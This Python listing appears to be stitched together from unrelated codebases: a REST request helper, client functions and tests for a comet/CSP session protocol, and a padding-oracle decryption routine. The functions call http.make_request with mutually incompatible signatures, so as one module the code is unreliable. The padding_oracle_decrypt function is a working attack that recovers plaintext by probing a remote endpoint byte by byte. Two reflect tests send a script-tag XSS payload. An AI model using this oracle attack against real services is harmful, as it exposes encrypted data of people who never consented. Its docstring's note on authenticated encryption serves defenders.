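def do_req(self, rtype, url, data=None, headers=None):
    """Send one request through ``http.make_request`` and decode the reply.

    ``url`` is first resolved by ``self._url_schema_headers``, which also
    yields a schema and a set of default headers; the defaults are used when
    the caller passes no (or empty) ``headers``.

    When ``data`` is a dict it is modified in place: ``$schema`` is filled in
    if absent, and for ``post``/``put`` requests ``self._add_gemini_auth`` is
    applied to it.

    Returns the JSON-decoded response, the raw response when it cannot be
    decoded as JSON, or ``None`` when sending the request raised.
    """
    config = self.config
    url, schema, default_headers = self._url_schema_headers(url)
    if not headers:
        headers = default_headers

    if isinstance(data, dict):
        if schema:
            data.setdefault('$schema', schema)
        if rtype in ('post', 'put'):
            loc = "parameters" if url.count('/metadata') else "properties"
            self._add_gemini_auth(data, loc)

    # NOTE(review): without "use_ssl" no certificate or CA arguments are
    # passed, so whether the body (including whatever _add_gemini_auth put
    # into it) travels over TLS depends on make_request and the URL -- confirm.
    try:
        request_args = [rtype, url, headers, json.dumps(data)]
        if config.get("use_ssl", None):
            request_args.extend([
                config.get('ssl_cert', None),
                config.get('ssl_key', None),
                config['ssl_cafile'],
            ])
        r = http.make_request(*request_args)
    except Exception:
        # `except Exception` rather than a bare `except:` so KeyboardInterrupt
        # and SystemExit are no longer swallowed. A missing 'ssl_cafile' key or
        # unserialisable data is still reported as "Could not reach", as before.
        logger.info("do_req", msg="Could not reach %s" % url)
        return None

    try:
        return json.loads(r)
    except (ValueError, TypeError):
        # Not JSON text (or not a string at all): hand back the raw response.
        return r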
def test_duration_timeout(self):
    """Check that a comet request with ``du=1`` comes back as an empty batch."""
    session, handshake_response = protocol.handshake()
    comet_url = config.base_url + "/comet?du=1&s=" + session.key
    response = http.make_request(comet_url, timeout=1.2)

    # The first and last characters of the body are dropped before decoding.
    batch = json.loads(response.body[1:-1])
    if batch == []:
        print(response.formatted_transcript())
        return
    raise CSPException("Invalid comet response: expected empty batch", response)
def padding_oracle_decrypt(cypher_text, url, key, block_size = 16):
    """Probe a remote endpoint byte by byte and return the values it accepted.

    ``cypher_text`` is passed through ``common.hex_to_ascii`` and then treated
    as ``length // block_size`` blocks of ``block_size`` bytes. Candidate
    values are sent with ``http.make_request(url, key, ...)``; a truthy return
    ends the search for that byte.

    Defensive reading: the procedure depends on the endpoint giving a
    distinguishable answer for each modified ciphertext. Authenticating the
    ciphertext before decrypting it (encrypt-then-MAC or an AEAD mode) and
    answering every failure identically removes that signal.

    Returns the working list ``D`` converted by ``common.ascii_to_string``.
    """
    # presumably yields a sequence of byte values, since it is XORed with
    # lists of ints below -- confirm against common.hex_to_ascii
    cypher_text = common.hex_to_ascii(cypher_text)
    length = len(cypher_text)
    count = length // block_size
    # One slot per ciphertext byte, all zero until a value is stored.
    D = [0] * length
    def clear(block):
        # D up to the end of the first `block` blocks, zero-filled to `length`.
        return D[:block * block_size] + [0] * (length - (block * block_size))
    def padding(index, pad):
        # Zeros up to `index`, then `pad` repeated `pad` times, then one block
        # of zeros.
        return [0] * index + [pad] * pad + [0] * block_size
    # Blocks are visited from the last down to block 1, bytes from the last
    # position of a block down to the first.
    for block in xrange(count - 1, 0, -1):
        for byte in xrange(block_size - 1, -1, -1):
            # Position being varied lies in the block before `block`.
            index = ((block - 1) * block_size) + byte
            for current in xrange(256):
                D[index] = current
                cleared = clear(block)
                padded = padding(index, block_size - byte)
                result = common.three_xor(cypher_text, cleared, padded)
                # One network round trip per candidate value.
                if http.make_request(url, key, common.ascii_to_string(result)):
                    break
            # NOTE(review): indentation is not visible in this listing; this
            # check is shown after the candidate loop -- confirm against the
            # original file.
            if current == 255:
                D[index] = block_size - byte
    return common.ascii_to_string(D)
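def handshake():
    """Perform a handshake request and build a ``Session`` from the reply.

    The body is JSON-decoded after dropping its first and last characters, and
    the ``'session'`` entry is passed to ``Session``.

    Returns:
        ``(session, response)``.

    Raises:
        error.CSPException: if the body cannot be decoded or the session
            cannot be constructed from it.
    """
    response = http.make_request(config.base_url + '/handshake?d={}')
    try:
        session_data = json.loads(response.body[1:-1])
        session = Session(session_data['session'])
    except Exception:
        # `except Exception` rather than a bare `except:` so KeyboardInterrupt
        # and SystemExit are not converted into a protocol error.
        raise error.CSPException("Invalid handshake response", response)
    return session, response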
def test_handshake_get_valid_rsrp(self):
    """Handshake with ``rp``/``rs`` set must wrap its reply in that prefix and suffix."""
    prefix = "testing"
    suffix = ";"
    response = http.make_request(self.base_url + "/handshake?d={}&rp=testing&rs=;")

    if response.code != 200:
        raise CSPException("Valid Handshake should return status code 200", response)

    body = response.body
    if not body.startswith(prefix):
        raise CSPException("Handshake returns invalid REQUEST_PREFIX", response)
    if not body.endswith(suffix):
        raise CSPException("Handshake returns invalid REQUEST_SUFFIX", response)

    # Strip the wrapper and validate what is left as an ordinary handshake reply.
    unwrapped = body[len(prefix) : -len(suffix)]
    self._verify_handshake_response(unwrapped, response)
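def send(self, data):
    """Send ``data`` to the ``/send`` endpoint for this session.

    The packet is the JSON encoding of ``[[self.sentEventId, 0, data]]``;
    ``self.sentEventId`` is incremented before the request is made.

    Returns:
        The response object.

    Raises:
        error.CSPException: if the response body does not contain ``'OK'``.
    """
    packet = json.dumps([[self.sentEventId, 0, data]])
    self.sentEventId += 1
    # NOTE(review): key and packet are concatenated into the query string
    # as-is; characters such as '&' or '#' in `data` would change how the
    # query is parsed. Presumably acceptable for this client -- confirm.
    response = http.make_request(config.base_url + '/send?s=' + self.key + '&d=' + packet)

    # XXX: check spec and fully parse response
    # Explicit test instead of `assert`, which is removed under `python -O`
    # and would have let every response through.
    try:
        acknowledged = 'OK' in response.body
    except Exception:
        acknowledged = False
    if not acknowledged:
        raise error.CSPException("Invalid send response", response)
    return response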
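def comet(self):
    """Issue a comet request for this session and concatenate the payloads.

    The body is JSON-decoded after dropping its first and last characters;
    element ``[2]`` of every packet is joined into one string.

    Returns:
        ``(output, response)``.

    Raises:
        error.CSPException: if the body cannot be decoded or a packet does not
            have the expected shape.
    """
    response = http.make_request(config.base_url + '/comet?s=' + self.key)
    try:
        packets = json.loads(response.body[1:-1])
        # XXX: use the proper decode function (urldecode, maybe)
        output = "".join(packet[2] for packet in packets)
    except Exception:
        # `except Exception` rather than a bare `except:` so KeyboardInterrupt
        # and SystemExit are not converted into a protocol error.
        raise error.CSPException("Invalid comet response", response)
    return output, response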
def test_reflect_get(self):
    """Reflect over GET must answer 200 and echo the ``d`` parameter verbatim."""
    session, handshake_response = protocol.handshake()
    payload = "<script>alert('woot')</script>"
    reflect_url = self.base_url + "/reflect?s=" + session.key + "&d=" + payload

    # The request reuses the handshake socket and keeps its transcript.
    response = http.make_request(
        reflect_url,
        reset_transcript=False,
        socket=handshake_response.socket,
    )
    # response.prepend_transcript(handshake_response.socket.transcript)

    if response.code != 200:
        raise CSPException("Reflect (GET) should return status code 200", response)
    # NOTE(review): only the verbatim echo is checked; the response
    # Content-Type is not inspected here.
    if payload != response.body:
        raise CSPException("Reflect (GET) returned invalid response body.", response)
    print(response.formatted_transcript())
def test_reflect_post(self):
    """Reflect over POST must answer 200 and echo the request body verbatim."""
    session, handshake_response = protocol.handshake()
    payload = "<script>alert('woot')</script>"
    reflect_url = self.base_url + "/reflect?s=" + session.key

    # The payload is the whole POST body; the handshake socket is reused.
    response = http.make_request(
        reflect_url,
        method='POST',
        body=payload,
        reset_transcript=False,
        socket=handshake_response.socket,
    )

    if response.code != 200:
        raise CSPException("Reflect (POST) should return status code 200", response)
    if payload != response.body:
        raise CSPException("Reflect (POST) returned invalid response body.", response)
def test_handshake_get_valid_w_data(self):
    """A handshake carrying a non-empty ``d`` object must still succeed."""
    handshake_url = self.base_url + '/handshake?d={"spam":"eggs"}'
    response = http.make_request(handshake_url)

    if response.code == 200:
        self._verify_handshake_response(response.body, response)
        return
    raise CSPException("Valid Handshake should return status code 200", response)
def _expect_failure_for_url(self, url, exception_message=None):
    """Request ``url`` (relative to ``self.base_url``) and treat a 200 reply as a failure."""
    response = http.make_request(self.base_url + url)
    if response.code != 200:
        # Any non-200 status counts as the expected rejection.
        return
    self._raise_exception(exception_message, response)